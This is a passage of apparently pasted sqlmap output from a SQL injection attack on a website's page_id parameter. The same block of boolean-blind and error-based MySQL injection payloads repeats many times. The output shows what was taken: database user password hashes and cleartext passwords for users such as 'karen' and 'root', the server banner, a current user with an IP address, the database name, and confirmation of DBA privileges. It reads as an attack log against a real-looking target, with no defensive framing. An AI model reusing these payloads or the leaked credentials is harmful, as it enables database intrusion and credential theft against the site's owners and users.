  853.     Title: AND boolean-based blind - WHERE OR HAVING clause
  854.     Payload: page_id=28167956 AND 1228=1228
  855.  
  856.     TYPE: error-based
  857.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  858.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  859. ---
  860.  
  861. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  862. ---
  863. Place: GET
  864. Parameter: page_id
  865.     TYPE: boolean-based blind
  866.     Title: AND boolean-based blind - WHERE OR HAVING clause
  867.     Payload: page_id=28167956 AND 1228=1228
  868.  
  869.     TYPE: error-based
  870.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  871.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  872. ---
  873.  
  874. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  875. ---
  876. Place: GET
  877. Parameter: page_id
  878.     TYPE: boolean-based blind
  879.     Title: AND boolean-based blind - WHERE OR HAVING clause
  880.     Payload: page_id=28167956 AND 1228=1228
  881.  
  882.     TYPE: error-based
  883.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  884.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  885. ---
  886.  
  887. DATABASE management system users password hashes:
  888. [*] karen [2]:
  889.     password hash: 1c00fc2b05570f2f
  890.     password hash: 248036c235f60aa8
  891. [*] nujeplies [1]:
  892.     password hash: NULL
  893. [*] root [5]:
  894.     password hash: 248036c235f60aa8
  895.     password hash: 248036c235f60aa8
  896.     password hash: 4fc67fc309a271b8
  897.     clear-text password: karen
  898.     clear-text password: karen
  899.     password hash: 4fc67fc309a271b8
  900.     clear-text password: karen
  901.     clear-text password: karen
  902.     password hash: NULL
  903. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  904. ---
  905. Place: GET
  906. Parameter: page_id
  907.     TYPE: boolean-based blind
  908.     Title: AND boolean-based blind - WHERE OR HAVING clause
  909.     Payload: page_id=28167956 AND 1228=1228
  910.  
  911.     TYPE: error-based
  912.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  913.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  914. ---
  915.  
  916. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  917. ---
  918. Place: GET
  919. Parameter: page_id
  920.     TYPE: boolean-based blind
  921.     Title: AND boolean-based blind - WHERE OR HAVING clause
  922.     Payload: page_id=28167956 AND 1228=1228
  923.  
  924.     TYPE: error-based
  925.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  926.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  927. ---
  928.  
  929. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  930. ---
  931. Place: GET
  932. Parameter: page_id
  933.     TYPE: boolean-based blind
  934.     Title: AND boolean-based blind - WHERE OR HAVING clause
  935.     Payload: page_id=28167956 AND 1228=1228
  936.  
  937.     TYPE: error-based
  938.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  939.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  940. ---
  941.  
  942. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  943. ---
  944. Place: GET
  945. Parameter: page_id
  946.     TYPE: boolean-based blind
  947.     Title: AND boolean-based blind - WHERE OR HAVING clause
  948.     Payload: page_id=28167956 AND 1228=1228
  949.  
  950.     TYPE: error-based
  951.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  952.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  953. ---
  954.  
  955. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  956. ---
  957. Place: GET
  958. Parameter: page_id
  959.     TYPE: boolean-based blind
  960.     Title: AND boolean-based blind - WHERE OR HAVING clause
  961.     Payload: page_id=28167956 AND 1228=1228
  962.  
  963.     TYPE: error-based
  964.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  965.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  966. ---
  967.  
  968. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  969. ---
  970. Place: GET
  971. Parameter: page_id
  972.     TYPE: boolean-based blind
  973.     Title: AND boolean-based blind - WHERE OR HAVING clause
  974.     Payload: page_id=28167956 AND 1228=1228
  975.  
  976.     TYPE: error-based
  977.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  978.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  979. ---
  980.  
  981. banner:    '5.0.45-log'
  982.  
  983. CURRENT USER:    'root@208.43.165.226'
  984.  
  985. CURRENT DATABASE:    'orcataco_bumperstic'
  986.  
  987. CURRENT USER IS DBA:    'True'